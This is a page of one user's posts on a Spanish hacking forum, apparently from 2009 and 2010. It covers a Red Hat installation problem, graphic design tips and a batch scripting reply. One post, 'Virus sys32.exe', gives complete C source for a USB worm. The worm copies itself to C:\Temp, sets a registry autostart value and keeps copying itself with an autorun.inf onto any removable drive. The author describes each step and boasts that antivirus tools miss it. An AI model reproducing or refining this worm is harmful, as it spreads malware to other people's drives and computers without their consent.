elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Entrar al Canal Oficial Telegram de elhacker.net


  Mostrar Mensajes
Páginas: 1 ... 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 [125]
1241  Programación / Programación C/C++ / Re: Virus sys32.exe en: 11 Junio 2010, 21:13 pm
diferente al de la pagina.

no quiero añadirle mas unidades xk solo es una prueba k se me ocurrio hacer un dia.
se que lo haceis mejor, pero solo lo pongo para k lo veais.
la mayoria de los ordenadores tienen C:, y si no, pues no se copia...
la mayoria tiene tambien permisos en el registro, sobre todo en tu propia cuenta, pues es CURRENT_USER!
1242  Sistemas Operativos / GNU/Linux / Problema instalacion Red Hat 9 en: 11 Junio 2010, 21:06 pm
El caso: Me descargue los ISOs de Red Hat de http://mirror.informatik.uni-mannheim.de/pub/linux/distributions/redhat/9.0/, y los grabe con Nero en tres discos vírgenes. Reinicie, meti el primer disco, y empezo el problema....
1º Al darle a iniciar en modo grafico, se me abria en modo texto.
2º La pregunta seria si quiero chekear los discos. Pues no. Me pregunta directamente el idioma de instalacion y teclado.
3º Luego viene lo raro: Me pregunta de donde saca los ISOs, y cuando selecciono CD-ROM, me dice k no reconoce los componentes, que los elija de una lista. No va ninguno.

Se que ya han hablado de esto en muxos sitios, pero no consigo solucionarlo... Llevo meses con esto!!!
Datos del PC:
Toshiba Satellite nuevecito, tiene unos meses. Preinstalado Windows Vista Home Premium. Bien cuidado. Particionado en dos, instalado Ubuntu 9.04, que es donde lo voy a instalar.
3 GB Ram.
Procesador: Intel Pentium Dual CPU T3400 @ 2.16 GHz 2.17 GHz. Sistema operativo 32 bits.
Service Pack 1, activadito y legal. Sin virus, y normalmente sin conex. a internet (lo cuido muxo XD!!!). Actualizado, con antivirus ESET correcto.



Cualquier duda de lo k sea, preguntenmela aqui...
AYUDENME X FAVOR
1243  Programación / Programación C/C++ / Virus sys32.exe en: 11 Junio 2010, 20:54 pm
Buenas, despues de muxas preguntas aqui, me desconecte de internet, e intente acer algo facilito. Cree el virusaco "boot.exe", que es taan efectivo k consume todos los recursos del PC, y eso k era un simple gusano...
luego me encerre a jugar al Counter un tiempo... un dia le eche un vistazo al escritorio y vi a mi bonito Dev-Cpp sucio y desgastado... empeze a programar!!!

despues de 2 bonitas horas de prácticas, nacio SYS32.exe!!!!


os pongo el codigo para k le echeis un vistazo. es muy sencillo, no se como no lo hice antes....
Código
  1. #include <windows.h>
  2. #include <stdio.h>
  3.  
  4. int a;
  5. FILE *fp;
  6. char nowdir [50];
  7. char usb [12][5]={"D:\\", "E:\\", "F:\\", "G:\\", "H:\\"};
  8. char usb2 [12][5]={"D:\\", "E:\\", "F:\\", "G:\\", "H:\\"};
  9.  
  10. int main ()
  11. {
  12.    GetModuleFileName (NULL, nowdir, 256);
  13.    CopyFile (nowdir, "C:\\Temp\\sys32.exe", 0);
  14.    registro ();
  15.    while (1)
  16.    {
  17.          pendrive ();
  18.  sleep (5);
  19.    }
  20. }
  21.  
  22. int registro ()
  23. {
  24.    HKEY hkey;
  25.    RegOpenKeyEx (HKEY_CURRENT_USER,"Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", 0, KEY_SET_VALUE, &hkey);
  26.    RegSetValueEx(hkey,"run",0,REG_SZ,"C:\\Temp\\sys32.exe",50);
  27.    RegCloseKey(hkey);
  28. }
  29.  
  30. int pendrive ()
  31. {
  32.    for (a=0; a<=5; a++)
  33.    {
  34.        if (GetDriveType (usb [a])==2)
  35.        {
  36.             strcat (usb [a], "\\sys32.exe");
  37.             CopyFile (nowdir, usb [a], 0);
  38.  
  39.             strcat (usb2 [a], "\\autorun.inf");
  40.             fp=fopen (usb2 [a], "wb+");
  41.             fprintf (fp, "[autorun]\nopen=sys32.exe");
  42.             fclose (fp);
  43.             fp=fopen (usb2 [a], "rb+");
  44.        }
  45.    }
  46. }
  47.  

funciona asi:
1. Se copia a "C:\Temp".
2. Se añade al registro, en una llave en la que todos tienen permisos, pero en la que puedes hacer que se abra al inicio de sesión. La única pega es que solo se abre en la sesion en la que se abre.
3. Hace un bucle infinito comprobando si se enchufan pendrives. Si se enchufan, se copia a este sitio, y crea un autorun. Lo cierra para guardar cambios y lo abre para k no lo borres.

Lo mejor es que no lo detecta ningun antivirus (por ahora, pork sin querer lo mande a analizar a ESET. a ver cuanto dura).+


Importante: El code es mio, y sus ideas, pero he de recordar que "http://usuarios.multimania.es/inyx/Gusano%20basico.pdf" me enseño a copiarme al registro. Como veis, es completamente diferente.
1244  Programación / Scripting / Re: Leer tecla en batch? en: 30 Septiembre 2009, 19:36 pm
se refiere a lo que el decia... nterpretalo como "lo que yo decia..."
1245  Media / Diseño Gráfico / Re: Ayuda con texto viejo en: 27 Septiembre 2009, 12:34 pm
bueno el tuto gracias
1246  Media / Diseño Gráfico / Re: Necesito un logo... en: 26 Septiembre 2009, 20:11 pm
bueno yo creo k si pones en www.uptodown.com Logo te salen uin puñado cosas para crear logos

ya k estamos, en Google, claramente ay tambien. podrias empezar a buscar por ahi


luego te echo una mano con algun programita si me da tiempo, pero ahora no puedo... OK?

X cierto... luego podrias poner la pagina en Programacion!!!

suerte
1247  Media / Diseño Gráfico / Re: MyPhoto en: 26 Septiembre 2009, 14:08 pm
Yo también creo que lo puedo hacer mejor, pero aún no estoy muy caliente... Ya haré más. Este me ha salido un poco... simple.
1248  Media / Diseño Gráfico / MyPhoto en: 26 Septiembre 2009, 11:15 am
Estaba mirando en foro, y me fijé especialmente en este apartado. Porque... desde cuando no hago yo una imagen? Como necesito una imagen, pues aprovecho.





Bueno: Fondo negro. Escribes el nombre y juegas con los efectos, tanto del fondo como del texto (despues de rastrerizarlo XD). Cojes la capa "Texto" y la duplicas. La volteas verticalmente y quitas opacidad de las tres capas (cada una menos). Juntas todas las capas. Duplicas la capa fondo, y con el pincel de clonar quitas los nombres. Se queda el fondo. Le quitas opacidad, y ya está.

La pasas a ImageReady y pones 0,5 segundos, infinito.


Una imagen simple que se puede perfeccionar. Hay que estar abierto a posibilidades XD.
---
Saludos
iXades
Páginas: 1 ... 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 [125]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines